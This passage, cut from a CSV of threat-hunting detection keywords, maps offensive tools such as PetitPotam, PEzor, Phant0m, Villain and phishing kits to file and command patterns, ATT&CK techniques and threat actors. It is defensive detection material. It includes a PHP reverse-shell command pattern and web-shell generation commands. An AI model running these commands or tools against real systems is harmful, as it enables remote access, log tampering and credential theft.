TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*PersStartup.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*PEScrambler.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*PetitPotam.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*PetitPotam.cpp*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*PetitPotam.exe*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.ps1*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*petitpotam.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*petitpotam.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*PetitPotam.py*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.sln*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*PetitPotam.sln*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*PetitPotam.vcxproj*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*petitpotam_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*PetitPotamModified.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*PEzor generated Beacon Object File*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*PEzor*/Inject.c*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*Pezor*inject.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*PEzor.sh -*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*PEzor.sh *.bin*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*PEzor/*/bof.cpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*PEzor/*syscalls.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*pfsense*reverse_root_shell_csrf/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*pfx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgfpignfckbloagkfnamnolkeaecfgfh*","greyware_tool_keyword","Free Proxy VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*pgpdisk2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgpsda2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pgpwde2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Phant0m scm 1*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*Phant0m scm 2*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*Phant0m wmi*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*phant0m.cna*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*Phant0m_cobaltstrike*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" +"*phant0m-exe.*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*Phant0m-master.zip*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*phant0m-rdll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*phantom_thread * shc *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*PhantomService.csproj*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*PhantomService.exe*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*phish_test.go*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*phish_windows_credentials.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Phish-Creds.ps1*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*phishery*","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1210 - T1565 - T1564.001","TA0002 - TA0007 - TA0010","N/A","N/A","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","10","947","208","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z" +"*phishing-HTML-linter.*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*phishlets *","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"*phising_attack.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*PhoenixMiner.exe*","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*PhoenixMiner_*_Windows\*","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*phoneinfoga scan -n *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*PhoneInfoga*","offensive_tool_keyword","PhoneInfoga","An OSINT framework for phone numbers.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/sundowndev/PhoneInfoga","1","0","N/A","N/A","10","10632","3055","2023-10-02T04:05:36Z","2018-10-25T09:19:47Z" +"*photon.py -u * -l 3 -t 100 --wayback*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*php -f *.php -- -o myShell.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" +"*php -r *$sock=fsockopen(*exec(*/bin/sh -i <&3 >&3 2>&3*","greyware_tool_keyword","php","php reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*php_filter_chain_generator --chain *php system*'cmd']*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*php_passthru_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*php_popen_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) 